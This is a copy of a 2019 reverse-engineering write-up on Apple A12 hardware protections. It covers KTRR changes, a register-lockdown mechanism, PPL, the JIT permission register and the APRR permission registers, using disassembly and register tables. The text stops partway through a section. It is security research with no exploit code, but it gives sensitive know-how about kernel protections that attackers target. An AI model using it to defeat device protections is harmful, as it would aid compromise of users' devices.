· 6 years ago · Aug 10, 2019, 02:46 AM
1APRR
2phoaxy, 08. Aug 2019
3
4APRR
5Of Apple hardware secrets. Found by phoaxy
6
7Introduction
8Almost a year ago I did a write-up on KTRR, first introduced in Apple’s A10 chip series. Now over the course of the last year, there has been a good bit of talk as well as confusion about the new mitigations shipped with Apple’s A12. One big change, PAC, has already been torn down in detail by Brandon Azad, so I’m gonna leave that out here. What’s left to cover is more than just APRR, but APRR is certainly the biggest chunk, hence the title of this post. Now the people who have attended TyphoonCon down in Seoul this year already got to see this research at an earlier stage - everyone else can get the slides here. On a separate note, Apple’s Head of Security Engineering Ivan Krstić returns to BlackHat US this year with a talk titled “Behind the scenes of iOS and Mac Security”. The bits about iOS 13 sure sound interesting, but this bit of the abstract caught my eye:
9
10We will also discuss previously-undisclosed VM permission and page protection technologies that are part of our overall iOS code integrity architecture.
11
12Let’s see if we can change this “previously-undisclosed” status, shall we? :P
13
14KTRR amended
15If you’ve read my KTRR post and poked a bit at any A12 kernel, chances are something caught your attention: __LAST.__pinst lost a lot of instructions.
16Here’s the entirety of __LAST.__pinst on A11:
17
180xfffffff007630000 202018d5 msr ttbr1_el1, x0
190xfffffff007630004 c0035fd6 ret
200xfffffff007630008 00c018d5 msr vbar_el1, x0
210xfffffff00763000c c0035fd6 ret
220xfffffff007630010 402018d5 msr tcr_el1, x0
230xfffffff007630014 c0035fd6 ret
240xfffffff007630018 001018d5 msr sctlr_el1, x0
250xfffffff00763001c c0035fd6 ret
260xfffffff007630020 bf4100d5 msr spsel, 1
270xfffffff007630024 c0035fd6 ret
280xfffffff007630028 00f21cd5 msr s3_4_c15_c2_0, x0
290xfffffff00763002c c0035fd6 ret
300xfffffff007630030 20f21cd5 msr s3_4_c15_c2_1, x0
310xfffffff007630034 c0035fd6 ret
320xfffffff007630038 c0f21cd5 msr s3_4_c15_c2_6, x0
330xfffffff00763003c c0035fd6 ret
34And here on A12:
35
360xfffffff008edc000 bf4100d5 msr spsel, 1
370xfffffff008edc004 c0035fd6 ret
380xfffffff008edc008 00f21cd5 msr s3_4_c15_c2_0, x0
390xfffffff008edc00c c0035fd6 ret
400xfffffff008edc010 20f21cd5 msr s3_4_c15_c2_1, x0
410xfffffff008edc014 c0035fd6 ret
420xfffffff008edc018 c0f21cd5 msr s3_4_c15_c2_6, x0
430xfffffff008edc01c c0035fd6 ret
44These were the instructions that should not exist anywhere else in the kernel, in order to not have them executable after reset. But sure enough if you go looking for the missing ones now, you’ll find them scattered all throughout the kernel, apparently entirely unprotected. But while Apple is scatterbrained at times, they’re not that scatterbrained[citation needed]. The thing is, when you try and jump to any instruction writing to ttbr1_el1, vbar_el1 or tcr_el1, this happens:
45
46panic(cpu 0 caller 0xfffffff01dd79b84): "Undefined kernel instruction: pc=0xfffffff01dbd8084 instr=d518c000\n"
47Debugger message: panic
48Memory ID: 0xff
49OS version: 16A405
50Kernel version: Darwin Kernel Version 18.0.0: Tue Aug 14 22:07:18 PDT 2018; root:xnu-4903.202.2~1/RELEASE_ARM64_T8020
51Kernel UUID: BEFBC911—B1BC-3553—B7EA-1ECE60169886
52iBoot version: iBoot-4513.200.297
53secure boot?: YES
54Paniclog version: 10
55Kernel slide: 0x0000000016200000
56Kernel text base: 0xfffffff01d204000
57Epoch Time: sec usec
58 Boot : 0x5cc4e1ec 0x000c74d9
59 Sleep : 0x00000000 0x00000000
60 Wake : 0x00000000 0x00000000
61 Calendar: 0x5cc4e21d 0x000d3015
62What’s that faulting instruction d518c000, you ask? Bad news:
63
64$ rasm2 -aarm -b64 -D $(hexswap d518c000)
650x00000000 4 00c018d5 msr vbar_el1, x0
66It’s the very instruction we wanted to run.
67
68That makes a lot of sense when you think about it from a chip designer’s point of view though. The reason why Apple no longer stuffs these instructions under __LAST.__pinst is because they’ve upgraded their silicon to provide a much stronger guarantee, one that holds up even if they leave some instructions in by mistake, or if you can pull some cache magic to inject some of your own: they just flip a switch and make the instructions undefined altogether.
69
70And looking at set_tcr or set_mmu_ttb_alternate tells us exactly where this switch is (you can find them by just searching for the instructions):
71
72;-- set_tcr
730xfffffff0079d8c18 014040ca eor x1, x0, x0, lsr 16
740xfffffff0079d8c1c 21144092 and x1, x1, 0x3f
750xfffffff0079d8c20 e10000b5 cbnz x1, 0xfffffff0079d8c3c
760xfffffff0079d8c24 41f13cd5 mrs x1, s3_4_c15_c1_2
770xfffffff0079d8c28 21007e92 and x1, x1, 4
780xfffffff0079d8c2c 410100b5 cbnz x1, 0xfffffff0079d8c54
790xfffffff0079d8c30 402018d5 msr tcr_el1, x0
800xfffffff0079d8c34 df3f03d5 isb
810xfffffff0079d8c38 c0035fd6 ret
82;-- set_mmu_ttb_alternate
830xfffffff0079d8bd0 9f3f03d5 dsb sy
840xfffffff0079d8bd4 41f13cd5 mrs x1, s3_4_c15_c1_2
850xfffffff0079d8bd8 21007c92 and x1, x1, 0x10
860xfffffff0079d8bdc c10300b5 cbnz x1, 0xfffffff0079d8c54
870xfffffff0079d8be0 202018d5 msr ttbr1_el1, x0
880xfffffff0079d8be4 df3f03d5 isb
890xfffffff0079d8be8 c0035fd6 ret
90Both contain something that is not in public XNU sources, namely a read from the register s3_4_c15_c1_2, and a jump away if some certain bits are set. The place it jumps to calls panic with string attempt to set locked register, which is a pretty clear message. Searching for further accesses to s3_4_c15_c1_2 brings us to this snippet, which is run as part of the reset code:
91
920xfffffff0079d8bfc df3f03d5 isb
930xfffffff0079d8c00 0100f0d2 mov x1, -0x8000000000000000
940xfffffff0079d8c04 a00280d2 mov x0, 0x15
950xfffffff0079d8c08 000001aa orr x0, x0, x1
960xfffffff0079d8c0c 40f11cd5 msr s3_4_c15_c1_2, x0
970xfffffff0079d8c10 df3f03d5 isb
980xfffffff0079d8c14 c0035fd6 ret
99So it gets the value 0x8000000000000015. The code above tells us that 0x4 is for tcr_el1 and 0x10 for ttbr1_el1, but what about the other two? The code setting vbar_el1 contains no register check, but I’m assuming it’s controlled by bit 0x1. As for bit 63, I’m fairly confident that serves a slightly more… fine-grained purpose. Because there’s one register that used to be under __LAST.__pinst that we haven’t talked about yet: sctlr_el1.
100
101The thing with sctlr_el1 is that the instruction writing to it is not made undefined. In fact, the register is actively written to by the exception handlers if coming from EL0:
102
1030xfffffff0079cf304 001038d5 mrs x0, sctlr_el1
1040xfffffff0079cf308 c000f837 tbnz w0, 0x1f, 0xfffffff0079cf320
1050xfffffff0079cf30c 000061b2 orr x0, x0, 0x80000000
1060xfffffff0079cf310 000065b2 orr x0, x0, 0x8000000
1070xfffffff0079cf314 000073b2 orr x0, x0, 0x2000
1080xfffffff0079cf318 001018d5 msr sctlr_el1, x0
1090xfffffff0079cf31c df3f03d5 isb
110The tbnz there is a bit of a sloppy check, but under the assumption of kernel integrity it’s all fine. Basically the kernel checks for the EnIA bit here (which controls whether pacia instructions are no-ops), and if not set, sets bits EnIA, EnDA and EnDB. What’s happening here is that three of the five PAC keys are disabled for userland apps that are not arm64e, because those would otherwise crash horribly (the IB key is not disabled because it’s used for stack frames, which are local to each function and thus not an issue). These keys need to be re-enabled on entry to the kernel, and so sctlr_el1 actually has to be writeable. This would make it a very interesting target since it controls the MMU, which, if turned off, would allow us to run shellcode at EL1. But of course it’s not that simple.
111
112Even if you jump to an instruction that writes to sctlr_el1 and make it unset bit 0, which should turn off the MMU - it will simply not turn off. This is where (I’m wildly assuming) bit 63 from the s3_4_c15_c1_2 register comes in. It appears that certain bits of sctlr_el1 are locked down, while others remain writeable. I haven’t gone on to test which bits these are exactly, because for one the available sctlr_el1 gadgets are very uncomfortable to use, and for two we know that the PAC bits are writeable, the M bit is not, and the rest of the bits are, quite frankly, not of much interest to me.
113
114Of more interest to me was the question of whether s3_4_c15_c1_2 itself remains writeable and could be used to unlock these registers again. To which the answer is of course also no.
115The instructions writing to s3_4_c15_c1_2 are not themselves made undefined, but as with parts of sctlr_el1, the register value will simply not change anymore. I’m assuming this is also controlled by bit 63.
116
117Now, as might be obvious, my research in this area hasn’t gone into great detail so far. I hope to eventually find the time to revisit the register in question, and update this post accordingly.
118It’s clear though that the register’s purpose is to lock down other registers. Wanting to be more specific than just “the lockdown register”, I skimmed the ARMv8 spec for a place where registers are grouped together, but the most narrow group encompassing all of ttbr1_el1, tcr_el1, sctlr_el1 and vbar_el1 is the VMSA (Virtual Memory System Architecture), so for lack of a better name I propose s3_4_c15_c1_2 to be called VMSA_LOCKDOWN_EL1.
119
120As a side note, there seems to exist a register by the same name on chips older than the A12, but that exhibits entirely different behaviour and does not seem to affect VMSA registers at all.
121And I feel like I should also note that there is another register introduced with the A12: s3_4_c15_c2_5. The numbering puts it just above the other three KTRR registers:
122
1230xfffffff0079d410c 71f21cd5 msr s3_4_c15_c2_3, x17
1240xfffffff0079d4110 93f21cd5 msr s3_4_c15_c2_4, x19
1250xfffffff0079d4114 510280d2 mov x17, 0x12
1260xfffffff0079d4118 b1f21cd5 msr s3_4_c15_c2_5, x17
1270xfffffff0079d411c 310080d2 mov x17, 1
1280xfffffff0079d4120 51f21cd5 msr s3_4_c15_c2_2, x17
129Being written to right in the middle of the KTRR lockdown sequence would suggest it is part of KTRR, but I have to admit I have no idea what it does, or what the value 0x12 means that is written to it.
130
131A thing called PPL
132The VMSA_LOCKDOWN_EL1 register from the last section seems to have neither gotten any public attention, nor affected exploitation of the A12. What got a lot more attention, of course, was PAC. Being part of the ARMv8 spec, it was fairly public, and seems to have been treated as the big thing new to the A12, security-wise. And in the beginning it seemed really strong, but after Brandon Azad discovered a design flaw or two, it doesn’t really hold up to a motivated attacker anymore. But the A12 came with yet another security… thing - and this one, in my humble opinion, is the real killer: PPL.
133
134Basically A12 kernels have a bunch of new segments:
135
136LC 03: LC_SEGMENT_64 Mem: 0xfffffff008eb4000-0xfffffff008ec8000 __PPLTEXT
137LC 04: LC_SEGMENT_64 Mem: 0xfffffff008ec8000-0xfffffff008ed8000 __PPLTRAMP
138LC 05: LC_SEGMENT_64 Mem: 0xfffffff008ed8000-0xfffffff008edc000 __PPLDATA_CONST
139LC 07: LC_SEGMENT_64 Mem: 0xfffffff008ee0000-0xfffffff008ee4000 __PPLDATA
140Of course Apple won’t tell us what the acronym “PPL” stands for (~anyone at Blackhat willing to annoy Ivan over this? :P~ UPDATE: it stands for “Page Protection Layer”!), but that doesn’t stop us from taking it apart.
141
142Anyone doing post-exploitation on A12 will have undoubtedly come across PPL already. Because a bunch of memory patches that used to work just fine on A11 and earlier (namely trust cache injection and page table patches) make the A12 kernel panic with a kernel data abort (i.e. insufficient memory permissions). The thing is though, the kernel can definitely still write to that memory somehow - and if you try and track down the code that does so, you’ll find that all such accesses happen from inside __PPLTEXT. It would appear as though that code was “privileged” somehow - but of course you can’t just invoke it, since that will also panic, this time with an instruction fetch abort. Of course you can then go track down the code that calls into __PPLTEXT, which will reveal that all such invocations go through __PPLTRAMP.
143
144At this point, there are two areas of interest one can dive into:
145
146What kind of code exists in PPL, what parts of it are exposed through the trampoline, and how you can invoke them.
147How this “privileged mode” works, what the underlying hardware primitives are, and what makes the PPL segments so special.
148Point 1 has already been covered in a detailed write-up by Jonathan Levin, which I encourage you to read if you want to know more about that. The gist of it is that there are a bunch of “interesting things” such as page tables, trust caches and more (again, see Jonathan’s post) that are now only accessible in “privileged mode”, and thus remain protected even in the face of an attacker with “normal” kernel rwx. That might seem like adding just another layer to be hacked, but you’ll find that the reduction in attack surface is actually huge when you start counting pages. In the iPhone XR’s 12.0.1 kernel (random example because I had that one handy), there are 1339 pages in __TEXT_EXEC but a mere 5 pages in __PPLTEXT. Here’s a visualisation of that:
149
150PPL vs TEXT_EXEC
151
152Page tables and equally critical things had been freely (and needlessly!) accessible from that entire red part, when the green part was all that really required such access, so it only makes sense to lock that down. In addition, locking down page tables can foil the plans of some newbie hacker who thought he was really smart once upon a time:
153
154My genius tweets
155
156So far so good for point 1 above, but point 2 is what I’m really here for. This is something that has gotten zero public mention, and I was surprised to learn that barely anyone I know seems to have researched this in private as well (granted, it’s not required for exploitation, but I consider it interesting nevertheless).
157
158Going about this logically, there will have to be two parts that make up this privileged mode:
159
160Some switch that is flipped on entry to and exit from __PPLTEXT.
161Some attribute that makes the __PPL* segments stand out from the rest.
162The former is found in __PPLTRAMP, right at the top of the entry/exit routines:
163
1640xfffffff008ecbfe0 34423bd5 mrs x20, daif
1650xfffffff008ecbfe4 df4703d5 msr daifset, 7
1660xfffffff008ecbfe8 ae8ae8f2 movk x14, 0x4455, lsl 48
1670xfffffff008ecbfec ae8ac8f2 movk x14, 0x4455, lsl 32
1680xfffffff008ecbff0 ce8cacf2 movk x14, 0x6466, lsl 16
1690xfffffff008ecbff4 eece8cf2 movk x14, 0x6677
1700xfffffff008ecbff8 2ef21cd5 msr s3_4_c15_c2_1, x14
1710xfffffff008ecbffc df3f03d5 isb
1720xfffffff008ecc000 df4703d5 msr daifset, 7
1730xfffffff008ecc004 ae8ae8f2 movk x14, 0x4455, lsl 48
1740xfffffff008ecc008 ae8ac8f2 movk x14, 0x4455, lsl 32
1750xfffffff008ecc00c ce8cacf2 movk x14, 0x6466, lsl 16
1760xfffffff008ecc010 eece8cf2 movk x14, 0x6677
1770xfffffff008ecc014 35f23cd5 mrs x21, s3_4_c15_c2_1
1780xfffffff008ecc018 df0115eb cmp x14, x21
1790xfffffff008ecc01c e1050054 b.ne 0xfffffff008ecc0d8
1800xfffffff008ed3fec ae8ae8f2 movk x14, 0x4455, lsl 48
1810xfffffff008ed3ff0 8e8ac8f2 movk x14, 0x4454, lsl 32
1820xfffffff008ed3ff4 ce8cacf2 movk x14, 0x6466, lsl 16
1830xfffffff008ed3ff8 ee8e8cf2 movk x14, 0x6477
1840xfffffff008ed3ffc 2ef21cd5 msr s3_4_c15_c2_1, x14
1850xfffffff008ed4000 df3f03d5 isb
186And the latter is found in page tables (the permissions shown here are kernel/user - note that these permissions not only apply to PPL segments but also data dynamically allocated by PPL):
187
188PPL page tables
189
190Obviously the PPL pages don’t really have these permissions - that’s just what’s the page table entries say. The real permissions are like this for “unprivileged”/normal mode:
191
192PPL page tables unpriv
193
194And get flipped to this for “privileged”/PPL mode:
195
196PPL page tables priv
197
198Before we can dive into how that works though, we have to look at something else. Something that, too, has not been publicly torn down. Something that, too, has to do with memory access permissions.
199
200A new JIT on the block
201This tale starts, because how could it be any different, with Ivan Krstić’s 2016 BlackHat talk. In the part about JIT, he has helpful graphics showing how JIT was implemented up to and including iOS 9 (images blatantly stolen from his slides):
202
203not da wae
204
205And how this would change with iOS 10:
206
207da wae
208
209(For more info on that, go check out his talk - going forward here, I assume you know how that works.)
210
211That was nice and well, but just a year later with the release of the A11, Apple moved back to a unified JIT region - with a little caveat. Rather than being fully RWX, a proprietary system register would control whether the region was currently rw- or r-x, and all JIT-emitting code would access configure register accordingly. One such JIT-emitting code looks as follows (taken from the XR’s 12.1 JSC, again simply because I had that one handy):
212
2130x188347298 002298f2 movk x0, 0xc110
2140x18834729c e0ffbff2 movk x0, 0xffff, lsl 16
2150x1883472a0 e001c0f2 movk x0, 0xf, lsl 32
2160x1883472a4 0000e0f2 movk x0, 0, lsl 48
2170x1883472a8 000040f9 ldr x0, [x0]
2180x1883472ac e0f21cd5 msr s3_4_c15_c2_7, x0
2190x1883472b0 df3f03d5 isb
2200x1883472b4 012298f2 movk x1, 0xc110
2210x1883472b8 e1ffbff2 movk x1, 0xffff, lsl 16
2220x1883472bc e101c0f2 movk x1, 0xf, lsl 32
2230x1883472c0 0100e0f2 movk x1, 0, lsl 48
2240x1883472c4 280040f9 ldr x8, [x1]
2250x1883472c8 e9f23cd5 mrs x9, s3_4_c15_c2_7
2260x1883472cc 1f0109eb cmp x8, x9
2270x1883472d0 c1020054 b.ne 0x188347328
2280x1883472d4 e00315aa mov x0, x21
2290x1883472d8 e10314aa mov x1, x20
2300x1883472dc e20313aa mov x2, x19
2310x1883472e0 19a82b94 bl sym.imp._ZN3JSC4YarrL22createCharacterClass98Ev
2320x1883472e4 c8024039 ldrb w8, [x22]
2330x1883472e8 08020034 cbz w8, 0x188347328
2340x1883472ec 002398f2 movk x0, 0xc118
2350x1883472f0 e0ffbff2 movk x0, 0xffff, lsl 16
2360x1883472f4 e001c0f2 movk x0, 0xf, lsl 32
2370x1883472f8 0000e0f2 movk x0, 0, lsl 48
2380x1883472fc 000040f9 ldr x0, [x0]
2390x188347300 e0f21cd5 msr s3_4_c15_c2_7, x0
2400x188347304 df3f03d5 isb
2410x188347308 012398f2 movk x1, 0xc118
2420x18834730c e1ffbff2 movk x1, 0xffff, lsl 16
2430x188347310 e101c0f2 movk x1, 0xf, lsl 32
2440x188347314 0100e0f2 movk x1, 0, lsl 48
2450x188347318 280040f9 ldr x8, [x1]
2460x18834731c e9f23cd5 mrs x9, s3_4_c15_c2_7
2470x188347320 1f0109eb cmp x8, x9
2480x188347324 60020054 b.eq 0x188347370
2490x188347328 200020d4 brk 1
250So the system register in question is s3_4_c15_c2_7, and it gets its values from the hardcoded addresses 0xfffffc110/8 - which are on the “commpage”, outside the range in which userland code is allowed to map memory. Those values are set up by the kernel in commpage_populate, but obviously the parts we care about are once again not in public XNU sources. You can find it in assembly though by looking for xrefs to the string "commpage cpus==0", and then far down the funcation referencing that you’ll see something like this:
251
2520xfffffff007b85390 caee8ed2 mov x10, 0x7776
2530xfffffff007b85394 0a22a2f2 movk x10, 0x1110, lsl 16
2540xfffffff007b85398 eacecef2 movk x10, 0x7677, lsl 32
2550xfffffff007b8539c 4a46e6f2 movk x10, 0x3232, lsl 48
2560xfffffff007b853a0 ea038a9a csel x10, xzr, x10, eq
2570xfffffff007b853a4 cbee8ed2 mov x11, 0x7776
2580xfffffff007b853a8 0b42a2f2 movk x11, 0x1210, lsl 16
2590xfffffff007b853ac ebcecef2 movk x11, 0x7677, lsl 32
2600xfffffff007b853b0 4b46e6f2 movk x11, 0x3232, lsl 48
2610xfffffff007b853b4 eb038b9a csel x11, xzr, x11, eq
2620xfffffff007b853b8 28310439 strb w8, [x9, 0x10c]
2630xfffffff007b853bc 88b243f9 ldr x8, [x20, 0x760]
2640xfffffff007b853c0 0a8900f9 str x10, [x8, 0x110]
2650xfffffff007b853c4 88b243f9 ldr x8, [x20, 0x760]
2660xfffffff007b853c8 0b8d00f9 str x11, [x8, 0x118]
267At this point, the A11 JIT and A12 PPL look kinda similar.
268As for how both of them work and what gives it away, that brings us to the punch line of this post:
269
270Enter APRR
271Before the release of the A12, there were rumours about “userland KTRR” coming up, and that being called “APRR”. That’s not what happened, but let’s write down what we already know:
272
273PPL page tables are weirdly missing the UXN bit (which would make them executable under a standard ARMv8.* implementation).
274Entry and exit from PPL changes s3_4_c15_c2_1 to 0x4455445564666677/0x4455445464666477.
275Entry and exit from JIT-emitting code changes s3_4_c15_c2_7 to 0x3232767711107776/0x3232767712107776.
276Pretty much the only speculation I’ve heard on this matter is that Apple has simply repurposed the UXN page table bit somehow. On a technical level that is not true, but it’s an interesting notion that we’ll get back to later. As for the register values, everyone who talked about this simply treated them as magical constants, but here’s the first clue: all digits in these values are between 0x0 and 0x7, and there are none between 0x8 and 0xf. That would make it either an odd choice or a big coincidence if it were just some random constant.
277
278The second clue is the encoding space in which these registers are located: s3_4_c15_c2_*. Not only are these two registers in there, but so are the KTRR registers as well as this other register we found on the A12 that gets 0x12 written to it. This leaves us with:
279
280Register Note
281s3_4_c15_c2_0 ???
282s3_4_c15_c2_1 Used by PPL
283s3_4_c15_c2_2 KTRR_LOCK_EL1
284s3_4_c15_c2_3 KTRR_LOWER_EL1
285s3_4_c15_c2_4 KTRR_UPPER_EL1
286s3_4_c15_c2_5 Gets value 0x12 on A12
287s3_4_c15_c2_6 ???
288s3_4_c15_c2_7 Used by JIT, EL0-accessible
289That means there’s two registers we haven’t seen yet - let’s keep an eye out for those, shall we? Also from here on out, I’ll be referring to these registers simply by their last digit for brevity (e.g. as in “register 0 and 6 are the ones we have yet to see”).
290
291Alright, how do we find out more about APRR? Well we could simply search for instructions operating on these registers, but before we do that, let me introduce you to this high-tech hacking tool called strings…
292
293$ strings kernel | fgrep APRR
294"%s: invalid APRR index, " "start=%p, end=%p, aprr_index=%u, expected_index=%u"
295"pmap_page_protect: modifying an APRR mapping pte_p=%p pmap=%p prot=%d options=%u, pv_h=%p, pveh_p=%p, pve_p=%p, pte=0x%llx, tmplate=0x%llx, va=0x%llx ppnum: 0x%x"
296"pmap_page_protect: creating an APRR mapping pte_p=%p pmap=%p prot=%d options=%u, pv_h=%p, pveh_p=%p, pve_p=%p, pte=0x%llx, tmplate=0x%llx, va=0x%llx ppnum: 0x%x"
297"Unsupported APRR index %llu for pte 0x%llx"
298Not bad, this tells us quite a bit. For one, it seems that pmap_page_protect deals with APRR, so we’ll go check that out in a second. But for two, something a bit more inconspicuous, it sounds like APRR has indices. With that in mind, let’s dive into some assembly:
299
3000xfffffff008eb8624 0bf23cd5 mrs x11, s3_4_c15_c2_0
3010xfffffff008eb8628 2af23cd5 mrs x10, s3_4_c15_c2_1
3020xfffffff008eb862c c8f23cd5 mrs x8, s3_4_c15_c2_6
3030xfffffff008eb8630 49ff44d3 lsr x9, x26, 4
3040xfffffff008eb8634 29057e92 and x9, x9, 0xc
3050xfffffff008eb8638 49d774b3 bfxil x9, x26, 0x34, 2
3060xfffffff008eb863c 49db76b3 bfxil x9, x26, 0x36, 1
3070xfffffff008eb8640 2cf57ed3 lsl x12, x9, 2
3080xfffffff008eb8644 edc300b2 orr x13, xzr, 0x101010101010101
3090xfffffff008eb8648 edecacf2 movk x13, 0x6767, lsl 16
3100xfffffff008eb864c ada8e8f2 movk x13, 0x4545, lsl 48
3110xfffffff008eb8650 6d010dca eor x13, x11, x13
3120xfffffff008eb8654 eb0b0032 orr w11, wzr, 7
3130xfffffff008eb8658 6b21cc9a lsl x11, x11, x12
3140xfffffff008eb865c 7f010dea tst x11, x13
3150xfffffff008eb8660 81010054 b.ne 0xfffffff008eb8690
3160xfffffff008eb8664 ecce8cd2 mov x12, 0x6677
3170xfffffff008eb8668 ccccacf2 movk x12, 0x6666, lsl 16
3180xfffffff008eb866c ac8ac8f2 movk x12, 0x4455, lsl 32
3190xfffffff008eb8670 ac8ae8f2 movk x12, 0x4455, lsl 48
3200xfffffff008eb8674 4a010cca eor x10, x10, x12
3210xfffffff008eb8678 7f010aea tst x11, x10
3220xfffffff008eb867c a1000054 b.ne 0xfffffff008eb8690
3230xfffffff008eb8680 ea030032 orr w10, wzr, 1
3240xfffffff008eb8684 4921c99a lsl x9, x10, x9
3250xfffffff008eb8688 3f0108ea tst x9, x8
3260xfffffff008eb868c 00020054 b.eq 0xfffffff008eb86cc
327Lo and behold, there are those two system registers we just said we hadn’t seen yet! (Thought actually I lied - we’ve seen them already in __LAST.__pinst, that’s just a bit moot since we have zero context there.)
328What you’re looking at is part of the pmap_page_protect_internal function (a part which is yet again not in public sources, obviously) that has been inlined into pmap_page_protect, with x26 being a TTE about to be entered into a page table.
329
330So what’s happening here? At the top we have the register reads, then we have some bit mashing, and finally a few branches to panic() if the resulting values are not zero. And it’s the bit mashing we’re interested in. Translated to C code it would probably look really ugly, but put into words, there are three simple actions:
331
332The register values are XOR’ed with some constants (4545010167670101/0x4455445566666677).
333A 4-bit number is constructed from the TTE in the form of <AP[2:1]>:<PXN>:<UXN>.
334The value 0x7 is left-shifted by that number times four, and used to mask the XOR’ed value.
335That last bullet point is particularly interesting, because it precisely describes the concept of register indexing. If you’re not familiar with it, the ARMv8 Reference Manual has at least one good example I know of: MAIR_EL1, on page D13-3202:
336
337MAIR_EL1
338
339Long story short, in translation table entries you have an AttrIndx field with 3 bits, i.e. values from 0x0 to 0x7. Those are then used to index the MAIR_EL1 register to get the Attr* fields. Since you have 8 fields in a 64bit register, that makes each field 8 bits wide.
340
341And that is precisely what’s happening with APRR here, the only difference being that instead of a 3-bit index we have a 4-bit one, and hence the registers 0 and 1 have 16 fields that are each 4 bits wide. We left out register 6 above, which is indexed a bit differently - the index itself is the same, but its fields seem to be just 1 bit wide rather than 4 (a nice property about both of these values is that this translates to exactly one digit in hexadecimal/binary).
342
343This tells us the register layout, but we still don’t know the meaning of the individual fields. For that, it might be helpful to collect all values that are somehow used with these registers. Here’s that collection:
344
345Value description Register 0 Register 1 Register 6 Register 7
346XOR’ed in pmap_page_protect 0x4545010167670101 0x4455445566666677 - -
347Assigned after CPU reset (A11) 0x4545010165670101
3480x4545010167670101 0x4455445564666677 0b0000000000000000 0x3232767612107676
349Assigned after CPU reset (A12) 0x4545010065670001
3500x4545010067670001 0x4455445464666477
3510x4455445564666677 0b0000000000000000 0x3232767712107776
352PPL entry (A12) - 0x4455445564666677 - -
353PPL exit (A12) - 0x4455445464666477 - -
354Process has JIT disabled (A11) 0x4545010165670101 - 0b0000000001000000 -
355Process has JIT enabled (A11) 0x4545010167670101 - 0b0000000001000000 -
356Process has JIT disabled (A12) 0x4545010065670001 - 0b0000000001000000 -
357Process has JIT enabled (A12) 0x4545010067670001 - 0b0000000001000000 -
358JIT region is rw- - - - 0x3232767711107776
359JIT region is r-x - - - 0x3232767712107776
360And then we can do something else: we can take all possible 4-bit indices 0x0 through 0xf, write down what permission it would normally give us when used in a TTE.
361
362Index Kernel access Userland access
3630x0 rwx --x
3640x1 rwx ---
3650x2 rw- --x
3660x3 rw- ---
3670x4 rwx rwx
3680x5 rwx rw-
3690x6 rw- rwx
3700x7 rw- rw-
3710x8 r-x --x
3720x9 r-x ---
3730xa r-- --x
3740xb r-- ---
3750xc r-x r-x
3760xd r-x r--
3770xe r-- r-x
3780xf r-- r--
379And then we can take some of the values above, and index it for each row. Let’s take for example the values A12 uses when entering/exiting PPL (as well as some reg 0 value):
380
381Index Krn/Usr Reg 1 on PPL entry Reg 1 on PPL exit Changed? Reg 0
3820x0 rwx/--x 0x7 0x7 0x1
3830x1 rwx/--- 0x7 0x7 0x0
3840x2 rw-/--x 0x6 0x4 <– 0x0
3850x3 rw-/--- 0x6 0x6 0x0
3860x4 rwx/rwx 0x6 0x6 0x7
3870x5 rwx/rw- 0x6 0x6 0x6
3880x6 rw-/rwx 0x4 0x4 0x7
3890x7 rw-/rw- 0x6 0x6 0x6
3900x8 r-x/--x 0x5 0x4 <– 0x0
3910x9 r-x/--- 0x5 0x5 0x0
3920xa r--/--x 0x4 0x4 0x1
3930xb r--/--- 0x4 0x4 0x0
3940xc r-x/r-x 0x5 0x5 0x5
3950xd r-x/r-- 0x5 0x5 0x4
3960xe r--/r-x 0x4 0x4 0x5
3970xf r--/r-- 0x4 0x4 0x4
398Let’s first look at the reg 1 values. I’ve marked the two digits that change on entry/exit, and sure enough they affect precisely the protections that PPL pages are mapped with.
399Now let’s see, from 0x6 and 0x5 both to 0x4, that sound familiar? Maybe from a UNIX environment? Maybe from a tool called chmod?
400
401The big enlightenment
402They are permissions in rwx form! 0x4 = r, 0x2 = w, 0x1 = x.
403The four page table bits that normally determine the access protections have lost all meaning on newer Apple chips. They are now solely used to construct that 4-bit number, which is then used to index the APRR registers, which hold the actual permissions.
404Register 0 is used for EL0 permissions, register 1 for EL1. If registers 6 and 7 are still unclear, we can simply repeat the above process with them:
405
406Index Krn/Usr Reg 0 Reg 6 if JIT enabled Reg 7 if JIT rw- Reg 7 if JIT r-x Changed?
4070x0 rwx/--x 0x1 0x0 0x6 0x6
4080x1 rwx/--- 0x0 0x0 0x7 0x7
4090x2 rw-/--x 0x0 0x0 0x7 0x7
4100x3 rw-/--- 0x0 0x0 0x7 0x7
4110x4 rwx/rwx 0x7 0x0 0x0 0x0
4120x5 rwx/rw- 0x6 0x0 0x1 0x1
4130x6 rw-/rwx 0x7 0x1 0x1 0x2 <–
4140x7 rw-/rw- 0x6 0x0 0x1 0x1
4150x8 r-x/--x 0x0 0x0 0x7 0x7
4160x9 r-x/--- 0x0 0x0 0x7 0x7
4170xa r--/--x 0x1 0x0 0x6 0x6
4180xb r--/--- 0x0 0x0 0x7 0x7
4190xc r-x/r-x 0x5 0x0 0x2 0x2
4200xd r-x/r-- 0x4 0x0 0x3 0x3
4210xe r--/r-x 0x5 0x0 0x2 0x2
4220xf r--/r-- 0x4 0x0 0x3 0x3
423The only digit that changed in reg 7 is the one corresponding to rw-/rwx - which would seem like the permissions the JIT region is mapped with. And obviously that is also the only index at which reg 6 has a 1. To not beat around the bush any longer, register 6 tells us whether or not to consult register 7, and if we do, we use register 7 to mask out certain bits, i.e. if the digit in question is 0x1, that will strip the executable bit.
424
425With that all figured out, we can complete our register table from above with sensible names:
426
427Register Name
428s3_4_c15_c2_0 APRR0_EL1
429s3_4_c15_c2_1 APRR1_EL1
430s3_4_c15_c2_2 KTRR_LOCK_EL1
431s3_4_c15_c2_3 KTRR_LOWER_EL1
432s3_4_c15_c2_4 KTRR_UPPER_EL1
433s3_4_c15_c2_5 KTRR_UNKNOWN_EL1
434s3_4_c15_c2_6 APRR_MASK_EN_EL1
435s3_4_c15_c2_7 APRR_MASK_EL0
436If this was a bit too much bit shifting and twiddling for you, I have some slides from my TyphoonCon talk on how you get from the page table bits to the actual rwx permissions (available in full here, pages pages 103-119).
437
438Here’s how it would work in a standard ARMv8.* implementation:
439
440TTE bits
441
442And here’s how it works on chips with APRR (the orange boxes are register numbers):
443
444APRR TTE bits
445
446Two notes on these:
447
448This still isn’t the whole picture - there will be more detail further down this post, but that’s not gonna fit into a nice graph anymore.
449If you’re confused by the bits coming in from the top right, those are the “Hierarchical Permission Disable” bits (HPD). Basically a page table can already have bits set that say it can never map anything as writeable or so, and then the write bit is stripped out of any entry mapped under it.
450Mitigations gone rogue
451Remember earlier where I mentioned some people’s speculation that Apple has repurposed the UXN bit, and said that was an interesting way to put it? Time to revisit that. Let’s look at PPL page tables again:
452
453PPL page tables unpriv
454
